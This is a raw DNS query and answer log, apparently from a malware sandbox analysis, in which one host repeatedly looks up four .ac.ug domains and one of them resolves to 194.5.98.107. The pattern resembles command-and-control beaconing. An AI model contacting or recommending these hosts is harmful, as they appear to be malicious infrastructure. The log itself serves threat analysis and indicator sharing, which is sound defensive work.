Jun 26, 2022 09:46:19.972764015 CEST	192.168.2.6	8.8.8.8	0xef63	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:20.527023077 CEST	192.168.2.6	8.8.8.8	0xf017	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:21.836281061 CEST	192.168.2.6	8.8.8.8	0xb0c3	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:23.232126951 CEST	192.168.2.6	8.8.8.8	0xc28c	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:23.258554935 CEST	192.168.2.6	8.8.8.8	0xc296	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:23.283349037 CEST	192.168.2.6	8.8.8.8	0x5a53	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:24.919173002 CEST	192.168.2.6	8.8.8.8	0xb170	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:26.186084986 CEST	192.168.2.6	8.8.8.8	0x1c99	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:26.214508057 CEST	192.168.2.6	8.8.8.8	0x86e5	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:26.238574028 CEST	192.168.2.6	8.8.8.8	0xcd3	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:27.820296049 CEST	192.168.2.6	8.8.8.8	0x62cc	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:29.162329912 CEST	192.168.2.6	8.8.8.8	0x1261	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:29.200381994 CEST	192.168.2.6	8.8.8.8	0xc2c3	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:29.253309011 CEST	192.168.2.6	8.8.8.8	0x35a9	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:31.247152090 CEST	192.168.2.6	8.8.8.8	0xa0ee	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:32.667778969 CEST	192.168.2.6	8.8.8.8	0xa139	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:33.015280008 CEST	192.168.2.6	8.8.8.8	0x5df0	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:33.043329000 CEST	192.168.2.6	8.8.8.8	0x8bc1	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:34.348625898 CEST	192.168.2.6	8.8.8.8	0x944e	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:35.806056023 CEST	192.168.2.6	8.8.8.8	0x7aaa	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:35.834036112 CEST	192.168.2.6	8.8.8.8	0xafcb	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:35.862826109 CEST	192.168.2.6	8.8.8.8	0x1721	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:37.149254084 CEST	192.168.2.6	8.8.8.8	0x8619	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:38.397241116 CEST	192.168.2.6	8.8.8.8	0x2497	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:38.421745062 CEST	192.168.2.6	8.8.8.8	0x118d	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:38.943577051 CEST	192.168.2.6	8.8.8.8	0x2387	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:40.389466047 CEST	192.168.2.6	8.8.8.8	0x7593	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:41.557739019 CEST	192.168.2.6	8.8.8.8	0xd5ea	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:41.592691898 CEST	192.168.2.6	8.8.8.8	0xe5dd	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:41.707015991 CEST	192.168.2.6	8.8.8.8	0x240d	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:43.057265997 CEST	192.168.2.6	8.8.8.8	0x9ca0	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:44.241111040 CEST	192.168.2.6	8.8.8.8	0x9c48	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:44.268326998 CEST	192.168.2.6	8.8.8.8	0x3757	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:44.291924953 CEST	192.168.2.6	8.8.8.8	0x53dd	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:45.588435888 CEST	192.168.2.6	8.8.8.8	0x2ff2	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:46.926189899 CEST	192.168.2.6	8.8.8.8	0x6ffb	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:46.956815958 CEST	192.168.2.6	8.8.8.8	0x23cd	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:47.045470953 CEST	192.168.2.6	8.8.8.8	0x4316	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:48.388694048 CEST	192.168.2.6	8.8.8.8	0x97c2	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:49.737145901 CEST	192.168.2.6	8.8.8.8	0xdb06	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:49.759732962 CEST	192.168.2.6	8.8.8.8	0x74d5	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:49.780446053 CEST	192.168.2.6	8.8.8.8	0x30f5	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:51.131019115 CEST	192.168.2.6	8.8.8.8	0x9b03	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:52.489573956 CEST	192.168.2.6	8.8.8.8	0x6a72	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:52.512449980 CEST	192.168.2.6	8.8.8.8	0x88fa	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:52.536928892 CEST	192.168.2.6	8.8.8.8	0x4f30	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:53.803354025 CEST	192.168.2.6	8.8.8.8	0xf1b8	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:54.972790003 CEST	192.168.2.6	8.8.8.8	0xa4b6	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:54.994334936 CEST	192.168.2.6	8.8.8.8	0x3a03	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:55.015356064 CEST	192.168.2.6	8.8.8.8	0xe6d2	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:56.287367105 CEST	192.168.2.6	8.8.8.8	0x3ba8	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:57.506583929 CEST	192.168.2.6	8.8.8.8	0x8265	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:57.533893108 CEST	192.168.2.6	8.8.8.8	0x4e6d	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:57.560184956 CEST	192.168.2.6	8.8.8.8	0xa2a0	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:58.850754976 CEST	192.168.2.6	8.8.8.8	0x69ca	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:00.019772053 CEST	192.168.2.6	8.8.8.8	0xef71	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:00.040926933 CEST	192.168.2.6	8.8.8.8	0x54f	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:00.064255953 CEST	192.168.2.6	8.8.8.8	0x8b9	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:01.320076942 CEST	192.168.2.6	8.8.8.8	0x2232	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:02.488662004 CEST	192.168.2.6	8.8.8.8	0xf642	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:02.834417105 CEST	192.168.2.6	8.8.8.8	0xe751	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:02.855746984 CEST	192.168.2.6	8.8.8.8	0x878c	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:04.116741896 CEST	192.168.2.6	8.8.8.8	0x9625	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:05.284356117 CEST	192.168.2.6	8.8.8.8	0x196a	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:05.593838930 CEST	192.168.2.6	8.8.8.8	0x5033	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:06.250915051 CEST	192.168.2.6	8.8.8.8	0x9f4e	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:07.654623985 CEST	192.168.2.6	8.8.8.8	0x74ca	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:08.926732063 CEST	192.168.2.6	8.8.8.8	0xd8f7	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:09.218846083 CEST	192.168.2.6	8.8.8.8	0xed77	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:09.238074064 CEST	192.168.2.6	8.8.8.8	0x8f1	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:10.585858107 CEST	192.168.2.6	8.8.8.8	0xbd0e	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:11.740303040 CEST	192.168.2.6	8.8.8.8	0x4e35	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:12.144227982 CEST	192.168.2.6	8.8.8.8	0xe8fa	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:12.167809010 CEST	192.168.2.6	8.8.8.8	0xbac1	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:13.602176905 CEST	192.168.2.6	8.8.8.8	0xad50	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:14.769234896 CEST	192.168.2.6	8.8.8.8	0xd077	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:14.792699099 CEST	192.168.2.6	8.8.8.8	0xfd7c	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:15.100631952 CEST	192.168.2.6	8.8.8.8	0x54e4	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:16.445960999 CEST	192.168.2.6	8.8.8.8	0xcfd7	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:17.613542080 CEST	192.168.2.6	8.8.8.8	0xf6a9	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:17.632636070 CEST	192.168.2.6	8.8.8.8	0xcfc1	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:17.922254086 CEST	192.168.2.6	8.8.8.8	0xc18	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:19.196216106 CEST	192.168.2.6	8.8.8.8	0x5d04	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:20.366450071 CEST	192.168.2.6	8.8.8.8	0x951d	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:20.390060902 CEST	192.168.2.6	8.8.8.8	0xad41	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:20.413465977 CEST	192.168.2.6	8.8.8.8	0x8a5b	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:21.696197987 CEST	192.168.2.6	8.8.8.8	0x549b	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:22.865897894 CEST	192.168.2.6	8.8.8.8	0x72df	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:22.975537062 CEST	192.168.2.6	8.8.8.8	0x123	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:22.996891022 CEST	192.168.2.6	8.8.8.8	0x5478	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:24.274667025 CEST	192.168.2.6	8.8.8.8	0xdd42	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:25.442476988 CEST	192.168.2.6	8.8.8.8	0xc3ae	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:25.464106083 CEST	192.168.2.6	8.8.8.8	0x699f	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:25.485399008 CEST	192.168.2.6	8.8.8.8	0xf0de	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:26.744364023 CEST	192.168.2.6	8.8.8.8	0x28d	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 26, 2022 09:45:59.609529972 CEST	8.8.8.8	192.168.2.6	0x98be	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:01.287909031 CEST	8.8.8.8	192.168.2.6	0x629e	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:01.668832064 CEST	8.8.8.8	192.168.2.6	0x8c38	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:02.335402966 CEST	8.8.8.8	192.168.2.6	0xfc5b	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:03.521174908 CEST	8.8.8.8	192.168.2.6	0x96b2	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:05.224469900 CEST	8.8.8.8	192.168.2.6	0xad3d	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:05.407883883 CEST	8.8.8.8	192.168.2.6	0xb7e9	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:05.879934072 CEST	8.8.8.8	192.168.2.6	0x1817	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:07.183330059 CEST	8.8.8.8	192.168.2.6	0x8ef1	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:08.825110912 CEST	8.8.8.8	192.168.2.6	0xb4d	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:09.151824951 CEST	8.8.8.8	192.168.2.6	0x6dc3	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:09.415802002 CEST	8.8.8.8	192.168.2.6	0x3ad1	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:10.522844076 CEST	8.8.8.8	192.168.2.6	0x4e28	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:13.254749060 CEST	8.8.8.8	192.168.2.6	0x85c9	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:13.417113066 CEST	8.8.8.8	192.168.2.6	0x2bbe	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:13.861335993 CEST	8.8.8.8	192.168.2.6	0x2d75	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:14.943308115 CEST	8.8.8.8	192.168.2.6	0x15d6	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:16.600392103 CEST	8.8.8.8	192.168.2.6	0x3d72	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:16.668729067 CEST	8.8.8.8	192.168.2.6	0x2cf7	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:17.050290108 CEST	8.8.8.8	192.168.2.6	0x287e	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:18.172508955 CEST	8.8.8.8	192.168.2.6	0x7860	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:19.946038008 CEST	8.8.8.8	192.168.2.6	0x877b	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:20.489490032 CEST	8.8.8.8	192.168.2.6	0xef63	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:20.808574915 CEST	8.8.8.8	192.168.2.6	0xf017	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:21.855746031 CEST	8.8.8.8	192.168.2.6	0xb0c3	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:23.251566887 CEST	8.8.8.8	192.168.2.6	0xc28c	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:23.277683020 CEST	8.8.8.8	192.168.2.6	0xc296	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:23.900996923 CEST	8.8.8.8	192.168.2.6	0x5a53	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:24.938805103 CEST	8.8.8.8	192.168.2.6	0xb170	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:26.206334114 CEST	8.8.8.8	192.168.2.6	0x1c99	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:26.233730078 CEST	8.8.8.8	192.168.2.6	0x86e5	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:26.787453890 CEST	8.8.8.8	192.168.2.6	0xcd3	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:27.842549086 CEST	8.8.8.8	192.168.2.6	0x62cc	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:29.182220936 CEST	8.8.8.8	192.168.2.6	0x1261	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:29.220069885 CEST	8.8.8.8	192.168.2.6	0xc2c3	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:29.535430908 CEST	8.8.8.8	192.168.2.6	0x35a9	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:31.267640114 CEST	8.8.8.8	192.168.2.6	0xa0ee	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:33.007348061 CEST	8.8.8.8	192.168.2.6	0xa139	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:33.037226915 CEST	8.8.8.8	192.168.2.6	0x5df0	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:33.318209887 CEST	8.8.8.8	192.168.2.6	0x8bc1	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:34.429868937 CEST	8.8.8.8	192.168.2.6	0x944e	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:35.827079058 CEST	8.8.8.8	192.168.2.6	0x7aaa	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:35.855199099 CEST	8.8.8.8	192.168.2.6	0xafcb	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:36.128879070 CEST	8.8.8.8	192.168.2.6	0x1721	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:37.234436989 CEST	8.8.8.8	192.168.2.6	0x8619	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:38.417606115 CEST	8.8.8.8	192.168.2.6	0x2497	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:38.926244020 CEST	8.8.8.8	192.168.2.6	0x118d	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:39.367716074 CEST	8.8.8.8	192.168.2.6	0x2387	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:40.409852028 CEST	8.8.8.8	192.168.2.6	0x7593	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:41.579132080 CEST	8.8.8.8	192.168.2.6	0xd5ea	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:41.702279091 CEST	8.8.8.8	192.168.2.6	0xe5dd	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:42.044704914 CEST	8.8.8.8	192.168.2.6	0x240d	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:43.077081919 CEST	8.8.8.8	192.168.2.6	0x9ca0	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:44.260705948 CEST	8.8.8.8	192.168.2.6	0x9c48	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:44.287756920 CEST	8.8.8.8	192.168.2.6	0x3757	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:44.559916019 CEST	8.8.8.8	192.168.2.6	0x53dd	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:45.608629942 CEST	8.8.8.8	192.168.2.6	0x2ff2	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:46.948671103 CEST	8.8.8.8	192.168.2.6	0x6ffb	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:46.984714985 CEST	8.8.8.8	192.168.2.6	0x23cd	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:47.373270035 CEST	8.8.8.8	192.168.2.6	0x4316	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:48.407943964 CEST	8.8.8.8	192.168.2.6	0x97c2	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:49.756731033 CEST	8.8.8.8	192.168.2.6	0xdb06	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:49.778947115 CEST	8.8.8.8	192.168.2.6	0x74d5	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:50.115060091 CEST	8.8.8.8	192.168.2.6	0x30f5	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:51.151547909 CEST	8.8.8.8	192.168.2.6	0x9b03	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:52.510042906 CEST	8.8.8.8	192.168.2.6	0x6a72	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:52.535131931 CEST	8.8.8.8	192.168.2.6	0x88fa	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:52.786977053 CEST	8.8.8.8	192.168.2.6	0x4f30	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:53.820684910 CEST	8.8.8.8	192.168.2.6	0xf1b8	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:54.992006063 CEST	8.8.8.8	192.168.2.6	0xa4b6	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:55.012367964 CEST	8.8.8.8	192.168.2.6	0x3a03	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:55.273374081 CEST	8.8.8.8	192.168.2.6	0xe6d2	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:56.363706112 CEST	8.8.8.8	192.168.2.6	0x3ba8	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:57.528808117 CEST	8.8.8.8	192.168.2.6	0x8265	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:57.558281898 CEST	8.8.8.8	192.168.2.6	0x4e6d	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:57.833945036 CEST	8.8.8.8	192.168.2.6	0xa2a0	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:58.872860909 CEST	8.8.8.8	192.168.2.6	0x69ca	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:00.037149906 CEST	8.8.8.8	192.168.2.6	0xef71	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:00.062521935 CEST	8.8.8.8	192.168.2.6	0x54f	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:00.309726000 CEST	8.8.8.8	192.168.2.6	0x8b9	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:01.341156960 CEST	8.8.8.8	192.168.2.6	0x2232	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:02.832598925 CEST	8.8.8.8	192.168.2.6	0xf642	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:02.853538036 CEST	8.8.8.8	192.168.2.6	0xe751	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
